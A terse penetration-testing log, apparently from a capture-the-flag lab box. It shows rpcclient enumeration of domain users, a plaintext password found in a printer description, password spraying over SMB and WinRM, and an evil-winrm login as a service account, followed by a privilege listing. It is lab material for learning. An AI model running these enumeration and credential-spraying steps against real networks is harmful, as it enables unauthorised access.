6 rpc
# changed password again
$ rpcclient -U 'bnielson' 10.10.10.193
Enter WORKGROUP\bnielson's password:
rpcclient $> srvinfo
10.10.10.193 Wk Sv PDC Tim PrQ NT
platform_id : 500
os version : 10.0
server type : 0x80122b
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
# found new users and a password
# trying to see if we can find more smb or winrm inside?
# smb
[445][smb] host: 10.10.10.193 login: svc-print password: $fab@s3Rv1ce$1
[445][smb] host: 10.10.10.193 login: svc-scan password: $fab@s3Rv1ce$1
# winrm-brute
$ ./winrm-brute.rb -U ../users -P ../pass.txt 10.10.10.193
[SUCCESS] user: svc-print password: $fab@s3Rv1ce$1
$ evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Last updated